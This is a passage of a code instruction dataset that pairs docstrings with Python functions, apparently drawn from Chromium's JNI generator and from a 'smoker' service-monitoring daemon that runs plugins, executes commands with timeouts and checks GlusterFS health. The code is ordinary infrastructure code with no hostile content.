+template.. [/INST] def _SubstituteNativeMethods(self, template, sub_proxy=False):
+ ret = []
+ all_classes = self.helper.GetUniqueClasses(self.natives)
+ all_classes[self.class_name] = self.fully_qualified_class
+ for clazz, full_clazz in all_classes.items():
+ if not sub_proxy:
+ if clazz == jni_generator.ProxyHelpers.GetClass(self.use_proxy_hash):
+ continue
+ kmethods = self._GetKMethodsString(clazz)
+ namespace_str = ''
+ if self.namespace:
+ namespace_str = self.namespace + '::'
+ if kmethods:
+ values = {
+ 'NAMESPACE': namespace_str,
+ 'JAVA_CLASS': jni_generator.EscapeClassName(full_clazz),
+ 'KMETHODS': kmethods
+ }
+ ret += [template.substitute(values)]
+ if not ret: return ''
+ return '\n'.join(ret)
+[INST] Returns the implementation of the array of native methods.. [/INST] def GetJNINativeMethodsString(self):
+ template = string.Template("""\
+static const JNINativeMethod kMethods_${JAVA_CLASS}[] = {
+${KMETHODS}
+};
+""")
+ return self._SubstituteNativeMethods(template)
+[INST] Returns the code for RegisterNatives.. [/INST] def _AddRegisterNativesFunctions(self):
+ natives = self._GetRegisterNativesImplString()
+ if not natives:
+ return ''
+ template = string.Template("""\
+JNI_REGISTRATION_EXPORT bool ${REGISTER_NAME}(JNIEnv* env) {
+${NATIVES}\
+ return true;
+}
+""")
+ values = {
+ 'REGISTER_NAME':
+ jni_generator.GetRegistrationFunctionName(self.fully_qualified_class),
+ 'NATIVES':
+ natives
+ }
+ self._SetDictValue('JNI_NATIVE_METHOD', template.substitute(values))
+[INST] Returns the shared implementation for RegisterNatives.. [/INST] def _GetRegisterNativesImplString(self):
+ template = string.Template("""\
+ const int kMethods_${JAVA_CLASS}Size =
+ base::size(${NAMESPACE}kMethods_${JAVA_CLASS});
+ if (env->RegisterNatives(
+ ${JAVA_CLASS}_clazz(env),
+ ${NAMESPACE}kMethods_${JAVA_CLASS},
+ kMethods_${JAVA_CLASS}Size) < 0) {
+ jni_generator::HandleRegistrationError(env,
+ ${JAVA_CLASS}_clazz(env),
+ __FILE__);
+ return false;
+ }
+""")
+ if len(self.non_proxy_natives) != 0:
+ return self._SubstituteNativeMethods(template)
+ return ''
+[INST] Applies tuple fields (name, value) to xml.
+Both items must be not None to show in attribute list.. [/INST] def _open_tag(self, indent_lvl=0, **kwargs):
+ return self._sub(
+ self._crlf + "{i}<{name}".format(i=self._indent * indent_lvl,
+ name=self._tag_name)
+ + ''.join(' {name}="{val}"'.format(name=name, val=val)
+ for (name, val) in self._fields
+ if val is not None)
+ + '>', **kwargs)
+[INST] Will add text or another (arbitrary complex) XmlBuilder as children of element.. [/INST] def innerText(self, child):
+ self._children.append(child)
+ return self
+[INST] Recursively converts self and all children to xml.. [/INST] def dump(self, indent_lvl=0, **kwargs):
+ dumped_children = []
+ for child in filter(None, self._children):
+ if isinstance(child, XmlBuilder):
+ dumped_children.append(child.dump(indent_lvl=(indent_lvl + 1),
+ **kwargs))
+ else:
+ dumped_children.append("{child}".format(child=self._sub(child,
+ **kwargs)))
+ if self._tag_name:
+ return (self._open_tag(indent_lvl, **kwargs)
+ + ''.join(dumped_children)
+ + self._close_tag(indent_lvl, **kwargs))
+ return ''.join(dumped_children)
+[INST] Provided data (from plugins dictionary) and walking template, get all valid
+items and convert it to jUnit xml representation.
+
+Function have sane defaults (depends on calee opinion).. [/INST] def plugins_to_xml(dict_data,
+ yaml_filename=None,
+ yaml_data=default_config.YAML_CONFIG,
+ dict_templates=['All'],
+ additional_fields='AdditionalFields',
+ ts_attr='HtmlTestSuiteAttr',
+ tc_attr='HtmlTestCaseAttr',
+ tc_elem='HtmlTestCaseElem'):
+ def _apply(inst, custom_dict=None, **kwargs):
+ applied_args = {}
+ if custom_dict:
+ for k, v in custom_dict.items():
+ applied_args[k] = getattr(inst, v)
+ for k, v in kwargs.items():
+ applied_args[k] = getattr(inst, v)
+ return applied_args
+ if yaml_filename:
+ with open(yaml_filename) as f:
+ C = yaml.safe_load(f)
+ else:
+ C = yaml.safe_load(yaml_data)
+ results = {}
+ for template in dict_templates:
+ results[template] = rows.create(data=dict_data,
+ template=C[template],
+ additional_fields=C[additional_fields])
+ ts_data = {}
+ for res in results.keys():
+ ts_data[res] = collections.defaultdict(list)
+ ts_res = ts_data[res]
+ for row in results[res]:
+ ts_res[row.Node].append(row)
+ junit_xml = XmlBuilder()
+ for template_name, ts in ts_data.items():
+ with junit_xml.testsuites as html_tss:
+ html_tss(name=template_name)
+ for _node, tcs in ts.items():
+ with html_tss.testsuite as html_ts:
+ first = tcs[0] if tcs else None
+ if first:
+ html_ts(custom_dict=_apply(first,
+ custom_dict=C[ts_attr]))
+ for tc in tcs:
+ html_tc = html_ts.testcase(
+ custom_dict=_apply(tc, custom_dict=C[tc_attr]))
+ if tc.CaseStatus:
+ distinguisher = tc.CaseStatus
+ else:
+ distinguisher = tc.PluginStatus
+ if not tc.CaseName:
+ html_tc.name = tc.Plugin
+ if distinguisher == 'ERROR':
+ if tc.MsgError:
+ html_tc.error(message=escape(
+ list_to_string(tc.MsgError), quote=1))
+ else:
+ html_tc.error()
+ elif distinguisher == 'WARN':
+ out = html_tc.__getattr__('system-out')
+ if tc.MsgWarn:
+ out.__setattr__('message', escape(
+ list_to_string(tc.MsgWarn), quote=1))
+ return junit_xml.dump()
+[INST] Stop all plugins
+Wait until they are stopped if blocking=True. [/INST] def stop(self, blocking=True):
+ self.stopping = True
+ for plugin in self.plugins.values():
+ if plugin.current_run:
+ plugin.current_run.stop()
+ plugin.current_run.terminate()
+ if blocking:
+ plugins_left = self.plugins.keys()
+ plugins_left_cnt = len(plugins_left)
+ while plugins_left:
+ plugins_left = []
+ for name, plugin in self.plugins.items():
+ if not plugin.current_run:
+ continue
+ if plugin.current_run.is_alive():
+ plugins_left.append(name)
+ else:
+ plugin.current_run.join()
+ if plugins_left:
+ if len(plugins_left) != plugins_left_cnt:
+ lg.info("Waiting for %s plugins to shutdown: %s" % (len(plugins_left), ','.join(plugins_left)))
+ plugins_left_cnt = len(plugins_left)
+ time.sleep(0.5)
+[INST] Add process and force plugin run. [/INST] def add_process(self, plugins=None, filter=None):
+ plugins_list = []
+ if plugins:
+ for plugin in plugins:
+ plugins_list.append(self.get_plugin(plugin))
+ if filter:
+ plugins_list.extend(self.get_plugins(filter))
+ if len(plugins_list) == 0:
+ raise NoPluginsFound
+ process = {
+ 'plugins' : plugins_list,
+ }
+ plugins_name = []
+ for p in plugins_list:
+ plugins_name.append(p.name)
+ lg.info("Forcing run of %d plugins: %s" % (len(plugins_list), ', '.join(plugins_name)))
+ self.processes.append(process)
+ id = len(self.processes)-1
+ for plugin in plugins_list:
+ plugin.forced = True
+ plugin.forced_result = None
+ plugin.run()
+ return id
+[INST] Start run of plugins configured as such. [/INST] def run_plugins_with_interval(self):
+ for plugin in self.plugins.values():
+ if not plugin.params['Interval']:
+ continue
+ plugin.run()
+[INST] Join zombie workers of interval-triggered runs
+The results will be picked by REST server forked ends of the queues. [/INST] def join_timed_plugin_workers(self):
+ for plugin in self.plugins.values():
+ if not plugin.params['Interval']:
+ continue
+ if plugin.current_run:
+ plugin.current_run.join()
+ plugin.current_run = None
+[INST] Validate configuration
+Raise InvalidConfiguration exception if invalid. [/INST] def validate(self):
+ if self.params['Timeout'] <= 0:
+ raise InvalidConfiguration("Timeout parameter can't be 0")
+ if not self.params['Command'] and not self.params['Module']:
+ raise InvalidConfiguration("Command or Module parameter has to be set")
+ if self.params['Command'] and self.params['Module']:
+ raise InvalidConfiguration("Command and Module parameters cannot be set together")
+ if not self.params['Command'] and self.params['Parser']:
+ raise InvalidConfiguration("Parser can be used only with Command parameter")
+[INST] Run process
+Check if plugin should be run and execute it. [/INST] def run(self):
+ if self.current_run:
+ if self.current_run.is_alive():
+ return
+ self.current_run.join()
+ if self.forced:
+ self.current_run = PluginWorker(self.name, self.queue, self.params,
+ self.forced)
+ self.current_run.start()
+ elif self.params['Interval']:
+ if datetime.datetime.now() >= self.next_run:
+ self.current_run = PluginWorker(self.name, self.queue,
+ self.params)
+ self.current_run.start()
+ self.schedule_run()
+[INST] Schedule next plugin run
+Accept datetime object as time parameter or set
+current time if now parameter is True. [/INST] def schedule_run(self, time=None, now=False):
+ if time:
+ if isinstance(time, datetime.datetime):
+ self.next_run = time
+ else:
+ raise InvalidArgument(
+ 'Parameter time has to be an instance of datetime object')
+ elif now:
+ self.next_run = datetime.datetime.now()
+ elif self.params['Interval']:
+ self.next_run = (
+ datetime.datetime.now() +
+ datetime.timedelta(seconds=self.params['Interval']))
+[INST] Run system command and parse output. [/INST] def run_command(self, command, timeout=0):
+ result = Result()
+ lg.debug("Plugin %s: executing command %s" % (self.name, command))
+ try:
+ stdout, stderr, returncode = smoker.util.command.execute(
+ command, timeout=timeout)
+ except smoker.util.command.ExecutionTimeout as e:
+ raise PluginExecutionTimeout(e)
+ except Exception as e:
+ lg.exception(e)
+ raise PluginExecutionError(
+ "Can't execute command %s: %s" % (command, e))
+ if returncode:
+ status = 'ERROR'
+ else:
+ status = 'OK'
+ if self.params['Parser']:
+ try:
+ result = self.run_parser(stdout, stderr)
+ except Exception as e:
+ result.set_status('ERROR')
+ result.add_error(re.sub('^\n', '', stderr.strip()))
+ result.add_error('Parser run failed: %s' % e)
+ result.add_info(re.sub('^\n', '', stdout.strip()))
+ else:
+ json = None
+ try:
+ json = simplejson.loads(stdout)
+ except:
+ pass
+ if json:
+ if 'status' in json and json['status'] in [ 'OK', 'ERROR', 'WARN' ]:
+ try:
+ result.set_result(json, validate=True)
+ except ValidationError as e:
+ raise PluginMalformedOutput("Invalid JSON structure: %s" % e)
+ else:
+ raise PluginMalformedOutput("Missing status in JSON output: %s" % json)
+ else:
+ lg.debug("Plugin %s: using non-JSON output" % self.name)
+ result.set_status(status)
+ if stderr:
+ result.add_error(re.sub('^\n', '', stderr.strip()))
+ if stdout:
+ result.add_info(re.sub('^\n', '', stdout.strip()))
+ return result
+[INST] Run parser on given stdout/stderr
+Raise exceptions if anything happen. [/INST] def run_parser(self, stdout, stderr):
+ lg.debug("Plugin %s: running parser %s" % (self.name, self.params['Parser']))
+ if stdout:
+ lg.debug("Plugin %s: stdout: %s" % (self.name, stdout.strip()))
+ if stderr:
+ lg.debug("Plugin %s: stderr: %s" % (self.name, stderr.strip()))
+ try:
+ parser = __import__(self.params['Parser'], globals(), locals(), ['Parser'], 0)
+ except ImportError as e:
+ lg.error("Plugin %s: can't load parser %s: %s" % (self.name, self.params['Parser'], e))
+ raise
+ try:
+ parser = parser.Parser(stdout, stderr)
+ except Exception as e:
+ lg.error("Plugin %s: can't initialize parser: %s" % (self.name, e))
+ lg.exception(e)
+ raise
+ try:
+ result = parser.parse()
+ except Exception as e:
+ lg.error("Plugin %s: parser execution failed: %s" % (self.name, e))
+ lg.exception(e)
+ raise
+ return result
+[INST] Run Python module
+Raise exceptions if anything happen. [/INST] def run_module(self, module, **kwargs):
+ lg.debug("Plugin %s: running module %s" % (self.name, module))
+ try:
+ plugin = __import__(module, globals(), locals(), ['Plugin'], 0)
+ except ImportError as e:
+ lg.error("Plugin %s: can't load module %s: %s" %
+ (self.name, module, e))
+ raise
+ try:
+ plugin = plugin.Plugin(self, **kwargs)
+ except Exception as e:
+ lg.error("Plugin %s: can't initialize plugin module: %s" %
+ (self.name, e))
+ lg.exception(e)
+ raise
+ signal.signal(signal.SIGALRM, alarm_handler)
+ if 'timeout' not in kwargs:
+ kwargs['timeout'] = self.get_param('Timeout', default=120)
+ try:
+ signal.alarm(kwargs['timeout'])
+ result = plugin.run()
+ if not result:
+ result = plugin.result
+ except PluginExecutionTimeout:
+ result = self.error_result(
+ 'Plugin execution exceeded timeout %d seconds' %
+ kwargs['timeout'])
+ except Exception as e:
+ lg.error("Plugin %s: module execution failed: %s" % (self.name, e))
+ lg.exception(e)
+ signal.alarm(0)
+ raise
+ signal.alarm(0)
+ return result
+[INST] Run plugin, save result and schedule next run. [/INST] def run_plugin(self, force=False):
+ if self.params['Command']:
+ command = self.params['Command'] % self.escape(dict(self.params))
+ try:
+ result = self.run_command(command, self.params['Timeout'])
+ except Exception as e:
+ lg.error("Plugin %s: %s" % (self.name, e))
+ result = self.error_result(e)
+ elif self.params['Module']:
+ try:
+ result = self.run_module(self.params['Module'])
+ except Exception as e:
+ lg.error("Plugin %s: %s" % (self.name, e))
+ result = self.error_result(
+ re.sub('^\n', '', ('%s' % e).strip()))
+ else:
+ lg.error("Plugin %s: no Command or Module to execute!" % self.name)
+ result = self.error_result('No Command or Module to execute!')
+ if self.params['Action']:
+ lg.debug("Plugin %s: executing action" % self.name)
+ if self.params['Action']['Command']:
+ params = dict(self.params, **result.result)
+ params = self.escape(params)
+ try:
+ action = self.run_command(
+ self.params['Action']['Command'] %
+ params, timeout=self.params['Action']['Timeout'])
+ except Exception as e:
+ lg.error("Plugin %s: %s" % (self.name, e))
+ action = self.error_result(e)
+ elif self.params['Action']['Module']:
+ try:
+ action = self.run_module(
+ self.params['Action']['Module'], result=result)
+ except Exception as e:
+ lg.error("Plugin %s: %s" % (self.name, e))
+ action = self.error_result(e)
+ else:
+ lg.error("Plugin %s: no Action Command or Module to execute!" %
+ self.name)
+ action = self.error_result('No Command or Module to execute!')
+ result.set_action(action)
+ result.set_forced(force)
+ try:
+ self.result = result.get_result()
+ except ValidationError as e:
+ lg.error("Plugin %s: ValidationError: %s" % (self.name, e))
+ result = self.error_result('ValidationError: %s' % e)
+ result.set_forced(force)
+ self.result = result.get_result()
+ lg.info("Plugin %s result: %s" % (self.name, result.get_result()))
+[INST] Escape given string, dictionary or list
+If int, None or bool item is found, just pass
+Also pass if item can't be escaped by some other reason
+Raise exception if unknown data type. [/INST] def escape(self, tbe):
+ if isinstance(tbe, dict):
+ escaped = {}
+ for key, value in tbe.items():
+ if type(value) in [int, type(None), bool]:
+ escaped[key] = value
+ else:
+ try:
+ escaped[key] = re.escape(value)
+ except:
+ escaped[key] = value
+ elif isinstance(tbe, basestring):
+ try:
+ escaped = re.escape(tbe)
+ except:
+ escaped = tbe
+ elif isinstance(tbe, int) or isinstance(tbe, bool):
+ escaped = tbe
+ elif isinstance(tbe, list):
+ escaped = []
+ for value in tbe:
+ if type(value) in [int, type(None), bool]:
+ escaped.append(value)
+ else:
+ try:
+ escaped.append(re.escape(value))
+ except:
+ escaped.append(value)
+ else:
+ raise Exception("Unknown data type")
+ return escaped
+[INST] close unnecessary open sockets cloned on fork. [/INST] def close_unnecessary_sockets(self):
+ open_sockets = list()
+ allowed = ['socket.socket', 'socket._socketobject']
+ for x in gc.get_objects():
+ if any(t for t in allowed if t in repr(type(x))):
+ open_sockets.append(x)
+ for cur_socket in open_sockets:
+ if cur_socket.type == socket.SOCK_STREAM:
+ cur_socket.close()
+[INST] Add message into result
+Empty messages are skipped
+
+don't split message lines into
+multiple messages. [/INST] def add_msg(self, level, msg, multiline=False):
+ if not self.result['messages']:
+ self.result['messages'] = {
+ 'info' : [],
+ 'error': [],
+ 'warn' : [],
+ }
+ if not multiline:
+ messages = str(msg).split('\n')
+ else:
+ messages = [str(msg)]
+ for message in messages:
+ if not str(msg).strip():
+ continue
+ try:
+ self.result['messages'][level].append(str(message).strip())
+ except KeyError:
+ raise InvalidArgument("Level has to be info, error or warn")
+[INST] Validate result
+Skip if it was already validated to avoid
+unwanted re-validation. [/INST] def validate(self, force=False):
+ if force != True and self.validated == True:
+ return True
+ else:
+ try:
+ self._validate_status(self.result['status'])
+ self._validate_msg(self.result['messages'])
+ self._validate_component_result(self.result['componentResults'])
+ self._validate_action(self.result['action'])
+ finally:
+ self.validated = True
+[INST] Execute smoker.util.command.execute() with timeout (default 120 seconds)
+You shouldn't use anything else than this function from inside plugins!. [/INST] def execute(self, command, **kwargs):
+ if 'timeout' not in kwargs:
+ kwargs['timeout'] = self.plugin.get_param('Timeout', default=120)
+ return smoker.util.command.execute(command, **kwargs)
+[INST] Convert next run timestamp object to the ISO format. [/INST] def next_run_iso_format(next_run):
+ if isinstance(next_run, bool):
+ next_run = None
+ else:
+ next_run = next_run.isoformat()
+ return next_run
+[INST] Convert result dict to list just to have standardized API. [/INST] def standardized_api_list(component):
+ keyword = 'componentResults'
+ if (not isinstance(component, dict) or
+ keyword not in component or
+ not component[keyword]):
+ return component
+ results = dict(component)
+ results[keyword] = []
+ for key, value in component[keyword].items():
+ value['name'] = key
+ results[keyword].append({'componentResult': value})
+ return results
+[INST] Print information about set of plugins. [/INST] def print_plugins(plugins, forced=False):
+ plugins_result = []
+ for plugin in plugins:
+ plugins_result.append(print_plugin(plugin, forced))
+ return {'plugins': {'items': plugins_result}}
+[INST] Format json info about process in progress. [/INST] def print_in_progress(id):
+ location = '/processes/%d' % id
+ data = {
+ 'asyncTask': {
+ 'link': {
+ 'poll': location
+ }
+ }
+ }
+ response = make_response(json.dumps(data, indent=2))
+ response.status = 'Accepted'
+ response.status_code = 202
+ response.headers['Location'] = location
+ response.headers['content-type'] = 'application/json'
+ return response
+[INST] Execute command, wrapper for Command class. [/INST] def execute(command, timeout=None, **kwargs):
+ cmd = Command(command, **kwargs)
+ return cmd.run(timeout)
+[INST] Send signal to whole process tree
+By default send SIGTERM (15).
+If process doesn't exist, just pass. [/INST] def signal_ptree(pid, signal=15):
+ try:
+ process = psutil.Process(pid)
+ except psutil.NoSuchProcess:
+ return
+ children = get_ptree(process)
+ lg.info('Sending signal to process tree: signal=%s pid=%s process=%s children=%s' % (signal, process.pid, process.name, len(children)))
+ if children:
+ for child in children:
+ try:
+ lg.info('Sending signal to child process: signal=%s pid=%s process=%s' % (signal, child.pid, child.name))
+ os.kill(child.pid, signal)
+ except OSError as e:
+ if e.errno == 3:
+ lg.debug('Children process does not exist: pid=%s process=%s' % (child.pid, child.name))
+ continue
+ try:
+ lg.info('Sending signal to parent process: signal=%s pid=%s process=%s' % (signal, process.pid, process.name))
+ os.kill(process.pid, signal)
+ except OSError as e:
+ if e.errno == 3:
+ lg.debug('Parent process does not exist: pid=%s process=%s' % (process.pid, process.name))
+ pass
+[INST] Register cleanup function for given process id. [/INST] def _register_cleanup(pid):
+ lg.debug("Registering cleanup for pid %s" % pid)
+ atexit.register(_proc_cleanup, pid)
+[INST] Unregister cleanup function for given process id. [/INST] def _unregister_cleanup(pid):
+ lg.debug("Unregistering cleanup for pid %s" % pid)
+ if _PY3:
+ atexit.unregister(_proc_cleanup)
+ return
+ for handler in atexit._exithandlers:
+ (func, args, kwargs) = handler
+ if func == _proc_cleanup and args == (pid,):
+ atexit._exithandlers.remove(handler)
+[INST] Run command with given timeout.
+Return tuple of stdout, stderr strings and retval integer.. [/INST] def run(self, timeout=None, timeout_sigterm=3, timeout_sigkill=5):
+ def target():
+ try:
+ self.process = subprocess.Popen(self.command, **self.kwargs)
+ _register_cleanup(self.process.pid)
+ self.stdout, self.stderr = self.process.communicate()
+ self.stdout = self.stdout.decode('utf-8').strip() if self.stdout else ''
+ self.stderr = self.stderr.decode('utf-8').strip() if self.stderr else ''
+ self.returncode = self.process.returncode
+ except Exception as e:
+ self._exception = e
+ return e
+ thread = threading.Thread(target=target)
+ lg.debug("Executing command: command='%s' %s"
+ % (self.command, ' '.join('%s=%s' % (a, b) for a, b in self.kwargs.items())))
+ time_start = datetime.datetime.now()
+ thread.start()
+ if timeout:
+ thread.join(timeout)
+ if thread.is_alive():
+ signal_ptree(self.process.pid)
+ thread.join(timeout_sigterm)
+ if thread.is_alive():
+ signal_ptree(self.process.pid, signal=9)
+ thread.join(timeout_sigkill)
+ if thread.is_alive():
+ _unregister_cleanup(self.process.pid)
+ raise ThreadDeadlock("Process %s deadlocked thread %s" % (self.process.pid, thread.name))
+ _unregister_cleanup(self.process.pid)
+ raise ExecutionTimeout("Execution timeout after %s seconds" % timeout)
+ else:
+ thread.join()
+ if self._exception:
+ _unregister_cleanup(self.process.pid)
+ raise self._exception
+ lg.debug("Command execution done: time=%s returncode=%s" %
+ ((datetime.datetime.now() - time_start).seconds, self.returncode))
+ _unregister_cleanup(self.process.pid)
+ return (self.stdout, self.stderr, self.returncode)
+[INST] Main entrance
+check peers status
+check volumes status
+try to mount and unmount volume. [/INST] def run(self):
+ volume = self.plugin.get_param('Volume')
+ try:
+ self.check_peers()
+ except Exception as e:
+ self.result.add_component('Peers', 'ERROR', error=["Can't check peers: %s" % e])
+ lg.exception(e)
+ try:
+ self.check_volumes()
+ except Exception as e:
+ self.result.add_component('Volumes', 'ERROR', error=["Can't check volumes: %s" % e])
+ lg.exception(e)
+ if volume:
+ try:
+ self.mount(volume)
+ except Exception as e:
+ self.result.add_component('Mount', 'ERROR', error=["Can't mount volume: %s" % e])
+ lg.exception(e)
+ self.result.set_status()
+ return self.result
+[INST] Check peers status
+and add component result. [/INST] def check_peers(self):
+ peers = self.getPeersStatus()
+ status = 'OK'
+ messages = {
+ 'info' : [],
+ 'error': [],
+ 'warn' : [],
+ }
+ for host, peer in peers.items():
+ if peer['connected'] == True:
+ messages['info'].append('Peer %s is healthy: %s (Connected)' % (host, peer['status']))
+ else:
+ messages['error'].append('Peer %s is not healthy: %s (Disconnected)' % (host, peer['status']))
+ status = 'ERROR'
+ self.result.add_component('Peers', status, **messages)
+[INST] Check volumes status
+and add component result. [/INST] def check_volumes(self):
+ volumes = self.getVolumesStatus()
+ status = 'OK'
+ messages = {
+ 'info' : [],
+ 'error': [],
+ 'warn' : [],
+ }
+ if len(volumes) < 1:
+ messages['error'].append("No configured volumes found")
+ status = 'ERROR'
+ for vol, nodes in volumes.items():
+ if nodes['status'] != 1:
+ failed = []
+ for node, status in nodes.items():
+ if node != 'status' and status != 1:
+ failed.append(node)
+ messages['error'].append("Volume %s is not healthy (failed nodes: %s)" % (vol, ', '.join(failed)))
+ status = 'ERROR'
+ else:
+ messages['info'].append("Volume %s is healthy" % vol)
+ self.result.add_component('Volumes', status, **messages)
+[INST] Run daemon
+change effective uid/gid
+start thread for each check
+start webserver. [/INST] def run(self):
+ lg.info("Starting daemon")
+ if 'uid' in self.conf and 'gid' in self.conf:
+ if os.geteuid != self.conf['uid'] and os.getegid != self.conf['gid']:
+ try:
+ os.setegid(self.conf['gid'])
+ os.seteuid(self.conf['uid'])
+ except TypeError as e:
+ lg.error("Config parameters uid/gid have to be integers: %s" % e)
+ except OSError as e:
+ lg.error("Can't switch effective UID/GID to %s/%s: %s" % (self.conf['uid'], self.conf['gid'], e))
+ lg.exception(e)
+ self._shutdown(exitcode=1)
+ else:
+ lg.info("Not changing effective UID/GID, keeping %s/%s" % (os.geteuid(), os.getegid()))
+ if not isinstance(self.conf['bind_port'], int):
+ lg.error("Config parameter bind_port has to be integer")
+ config = {}
+ for key in ['plugins', 'templates', 'actions']:
+ try:
+ config[key] = self.conf[key]
+ except KeyError as e:
+ lg.warn("Config section not found: %s" % e)
+ if not config['plugins']:
+ lg.error('No configured plugins')
+ self._shutdown(exitcode=1)
+ if 'nr_concurrent_plugins' in self.conf:
+ config['semaphore_count'] = self.conf['nr_concurrent_plugins']
+ try:
+ self.pluginmgr = PluginManager(**config)
+ except Exception as e:
+ lg.error("Can't initialize PluginManager")
+ lg.exception(e)
+ self._shutdown(exitcode=1)
+ lg.info("Starting webserver on %(bind_host)s:%(bind_port)s"
+ % self.conf)
+ try:
+ self.server = RestServer(self)
+ self.server.start()
+ except Exception as e:
+ lg.error("Can't start HTTP server: %s" % e)
+ lg.exception(e)
+ self._shutdown(exitcode=1)
+ if hasattr(signal, 'SIGINT'):
+ signal.signal(signal.SIGINT, self._shutdown)
+ if hasattr(signal, 'SIGTERM'):
+ signal.signal(signal.SIGTERM, self._shutdown)
+ if hasattr(signal, 'SIGHUP'):
+ signal.signal(signal.SIGHUP, self._reopen_logfiles)
+ self._watchdog()
+[INST] Daemonize and run daemon
+Use double-fork magic to do that
+
+Use sys.exit() here instead of self._shutdown() because we don't have running
+daemon to shutdown in this function. [/INST] def daemonize(self):
+ if os.path.isfile(self.conf['pidfile']):
+ lg.error("PID file %s already exists" % self.conf['pidfile'])
+ sys.exit(1)
+ pid = os.fork()
+ if pid:
+ sys.exit(0)
+ os.chdir('/')
+ os.setsid()
+ os.umask(0)
+ pid = os.fork()
+ if pid:
+ sys.exit(0)
+ for log in ['stdout', 'stderr', 'stdin']:
+ path = os.path.dirname(self.conf[log])
+ if not os.path.exists(path):
+ os.mkdir(path)
+ redirect_standard_io(self.conf)
+ try:
+ fh = open(self.conf['pidfile'], 'w')
+ fh.write(str(os.getpid()))
+ fh.flush()
+ fh.close()
+ except Exception as e:
+ lg.error("Can't write PID into pidfile: %s" % e)
+ sys.exit(1)
+ try:
+ self.run()
+ except Exception as e:
+ self._shutdown(exitcode=1)
+ lg.exception(e)
+[INST] Shutdown smoker daemon (internal use)
+exitcode - exit code number (default 0)
+signum, frame - used by signal handler
+exception - if True, raise on exception, otherwise just log it and pass. [/INST] def _shutdown(self, signum=None, frame=None, exitcode=0, exception=False):
+ if self.pluginmgr and self.pluginmgr.stopping:
+ return
+ lg.info("Shutting down")
+ try:
+ if self.server:
+ try:
+ self.server.terminate()
+ self.server.join()
+ except AttributeError:
+ pass
+ if self.pluginmgr:
+ self.pluginmgr.stop()
+ if os.path.isfile(self.conf['pidfile']):
+ os.remove(self.conf['pidfile'])
+ except Exception as e:
+ lg.exception(e)
+ if exception:
+ raise
+ sys.exit(exitcode)
+[INST] Get client configuration from smokercli.yaml. [/INST] def _load_config():
+ conf_file = os.path.expanduser('~/.smokercli.yaml')
+ if not os.path.exists(conf_file):
+ conf_file = CONFIG_FILE
+ if not os.path.exists(conf_file):
+ return None
+ with open(conf_file) as f:
+ config = yaml.safe_load(f)
+ return config
+[INST] Get list of available host discovery plugin module names. [/INST] def _get_plugins(config):
+ plugins = []
+ if config and 'plugin_paths' in config:
+ paths = config['plugin_paths']
+ else:
+ raise Exception('Invalid config file')
+ for path in paths:
+ try:
+ module = __import__(path)
+ except ImportError:
+ raise Exception('Invalid config file')
+ toplevel = os.path.dirname(module.__file__)
+ submodule = '/'.join(path.split('.')[1:])
+ plugin_dir = os.path.join(toplevel, submodule, '*.py')
+ modules = [os.path.basename(name)[:-3] for name in
+ glob.glob(plugin_dir)]
+ modules.remove('__init__')
+ plugins += ['%s.%s' % (path, name) for name in modules]
+ return plugins
+[INST] Add host discovery plugin specific options to the cmdline argument parser. [/INST] def _add_plugin_arguments(parser, config):
+ plugins = _get_plugins(config)
+ if not plugins:
+ return
+ argument_group = parser.add_argument_group('Plugin arguments')
+ for plugin in plugins:
+ args = _get_plugin_arguments(plugin)
+ for argument in args:
+ argument_group.add_argument(*argument.args, **argument.kwargs)
+[INST] Dump plugins result to TAP
+Take OK and also WARN statuses as ok
+Print only error and warn results. [/INST] def dump_tap(plugins):
+ tap = Tap()
+ for name in sorted(plugins):
+ host = plugins[name]
+ if host['status'] in ['OK', 'WARN']:
+ host_ok = True
+ else:
+ host_ok = False
+ tap_host = TapTest(name, host_ok)
+ tap.add_test(tap_host)
+ for key in sorted(host['plugins']):
+ plugin = host['plugins'][key]
+ if not plugin['lastResult']:
+ plugin_ok = False
+ else:
+ if plugin['lastResult']['status'] in ['OK', 'WARN']:
+ plugin_ok = True
+ else:
+ plugin_ok = False
+ messages = []
+ if plugin['lastResult']:
+ if plugin['lastResult']['messages']:
+ messages = plugin['lastResult']['messages']
+ tap_plugin = TapTest(plugin['name'], plugin_ok, messages)
+ tap_host.add_subtest(tap_plugin)
+ if (plugin['lastResult'] and
+ plugin['lastResult']['componentResults']):
+ for component in plugin['lastResult']['componentResults']:
+ component = component['componentResult']
+ if component['status'] in ['OK', 'WARN']:
+ component_ok = True
+ else:
+ component_ok = False
+ messages = []
+ if component['messages']:
+ if component['messages']:
+ messages = component['messages']
+ tap_component = TapTest(component['name'], component_ok,
+ messages)
+ tap_plugin.add_subtest(tap_component)
+ return tap.dump()
+[INST] Add count of items as done. [/INST] def add_done(self, count=1):
+ assert isinstance(count, numbers.Integral), "Count must be integral number"
+ self.items_done += count
+[INST] Run thread
+While we have undone items, print progressbar. [/INST] def run(self):
+ while self.items_done < self.items_count:
+ try:
+ width, height = console.get_terminal_size()
+ except IOError:
+ width, height = (80, 37)
+ sys.stdout.write('\r%s' % (width * ' '))
+ sys.stdout.write('\r %s' % self.get_progress())
+ sys.stdout.flush()
+ time.sleep(self.speed)
+[INST] This function has to be called after progress bar stop to do the cleanup. [/INST] def stop(self):
+ print()
+[INST] Accept list pool of threads, watch if they are alive and update progress. [/INST] def wait_pool(self, pool):
+ assert isinstance(pool, list), "Parameter pool must be list of Thread objects"
+ while self.get_left():
+ done = 0
+ for t in pool:
+ assert isinstance(t, threading.Thread),\
+ "Object in pool must be instance of threading.Thread not %s" % type(t)
+ if not t.is_alive():
+ done += 1
+ self.set_done(done)
+ time.sleep(1)
+[INST] Check if plugin passes supplied filters. [/INST] def _match_filters(self, plugin, filters, negative=False, exclude_plugins=None):
+ if exclude_plugins:
+ if plugin['name'] in exclude_plugins:
+ return False
+ match_result = lambda match: not match if negative else match
+ match = True
+ for filter in filters:
+ if isinstance(filter, tuple):
+ key, value = filter
+ if key == 'status' and isinstance(value, list):
+ try:
+ if plugin['lastResult']['status'] in value:
+ match = True
+ if not negative: continue
+ else: break
+ else:
+ match = False
+ break
+ except (KeyError, TypeError):
+ if 'UNKNOWN' in value:
+ match = True
+ if not negative: continue
+ else: break
+ else:
+ match = False
+ break
+ elif isinstance(filter, dict):
+ try:
+ if plugin['parameters'][filter['key']] == filter['value']:
+ lg.debug("Plugin %s matched filter %s = %s" % (plugin['name'], filter['key'], filter['value']))
+ match = True
+ if not negative: continue
+ else: break
+ else:
+ lg.debug("Plugin %s doesn't match filter %s = %s" % (plugin['name'], filter['key'], filter['value']))
+ match = False
+ break
+ except KeyError:
